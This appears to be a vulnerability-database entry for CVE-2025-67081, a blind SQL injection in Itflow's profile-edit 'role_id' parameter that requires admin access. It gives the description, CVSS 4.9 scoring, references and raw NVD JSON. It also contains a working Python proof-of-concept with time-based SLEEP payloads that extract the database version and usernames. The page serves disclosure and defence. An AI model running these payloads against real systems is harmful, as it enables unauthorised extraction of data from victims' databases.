CVE-2025-67081

Description

An SQL injection vulnerability in Itflow through 25.06 has been identified in the "role_id" parameter when editing a profile. An attacker with admin account can exploit this issue via blind SQL injection, allowing for the extraction of arbitrary data from the database. The vulnerability arises from insufficient sanitizing on integer parameter.

CVSS Details

CVSS Score

4.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:itflow:itflow:*:*:*:*:*:*:*:* - VULNERABLE

Itflow < 25.06

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-67081 SQL Injection PoC for Itflow
Blind SQL Injection via role_id parameter in profile edit
Note: Requires admin privileges
"""

import requests
import time
import string

TARGET_URL = "http://target-host.com/profile_edit.php"
ADMIN_COOKIES = {"session": "admin_session_cookie_here"}

def test_sql_injection():
    """Test if the role_id parameter is vulnerable to SQL injection"""
    # Time-based blind SQL injection test
    payload = "1 AND IF(1=1, SLEEP(5), 0)"
    data = {"role_id": payload}
    
    start_time = time.time()
    response = requests.post(TARGET_URL, data=data, cookies=ADMIN_COOKIES)
    elapsed = time.time() - start_time
    
    if elapsed >= 5:
        print("[+] SQL Injection confirmed!")
        return True
    return False

def extract_database_version():
    """Extract database version using blind SQL injection"""
    charset = string.ascii_lowercase + string.digits + "-_."
    result = ""
    
    for pos in range(1, 50):
        for char in charset:
            payload = f"1 AND IF(SUBSTRING(@@version,{pos},1)='{char}', SLEEP(2), 0)"
            data = {"role_id": payload}
            
            start_time = time.time()
            requests.post(TARGET_URL, data=data, cookies=ADMIN_COOKIES)
            elapsed = time.time() - start_time
            
            if elapsed >= 2:
                result += char
                print(f"[*] Extracted: {result}")
                break
    
    return result

def extract_users():
    """Extract user credentials from database"""
    # Example: Extract username and password hash
    charset = string.ascii_lowercase + string.digits + string.ascii_uppercase
    username = ""
    
    for pos in range(1, 32):
        for char in charset:
            payload = f"1 AND IF(SUBSTRING((SELECT username FROM users LIMIT 1),{pos},1)='{char}', SLEEP(2), 0)"
            data = {"role_id": payload}
            
            start_time = time.time()
            requests.post(TARGET_URL, data=data, cookies=ADMIN_COOKIES)
            elapsed = time.time() - start_time
            
            if elapsed >= 2:
                username += char
                break
    
    return username

if __name__ == "__main__":
    print("[*] CVE-2025-67081 SQL Injection Test")
    if test_sql_injection():
        print("[*] Extracting database version...")
        version = extract_database_version()
        print(f"[+] Database Version: {version}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-67081
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-67081
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-67081/
[4] VulDB https://vuldb.com/cve/CVE-2025-67081
[5] https://github.com/itflow-org/itflow
[6] https://www.helx.io/blog/advisory-itflow/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-67081", "sourceIdentifier": "[email protected]", "published": "2026-01-15T15:15:50.740", "lastModified": "2026-01-23T18:35:09.720", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An SQL injection vulnerability in Itflow through 25.06 has been identified in the \"role_id\" parameter when editing a profile. An attacker with admin account can exploit this issue via blind SQL injection, allowing for the extraction of arbitrary data from the database. The vulnerability arises from insufficient sanitizing on integer parameter."}, {"lang": "es", "value": "Una vulnerabilidad de inyección SQL en Itflow hasta la versión 25.06 ha sido identificada en el parámetro 'role_id' al editar un perfil. Un atacante con cuenta de administrador puede explotar este problema a través de inyección SQL ciega, permitiendo la extracción de datos arbitrarios de la base de datos. La vulnerabilidad surge de una sanitización insuficiente en el parámetro entero."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:itflow:itflow:*:*:*:*:*:*:*:*", "versionEndIncluding": "25.06", "matchCriteriaId": "A4426A65-C3A8-4453-B209-4C4534130E0C"}]}]}], "references": [{"url": "https://github.com/itflow-org/itflow", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.helx.io/blog/advisory-itflow/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}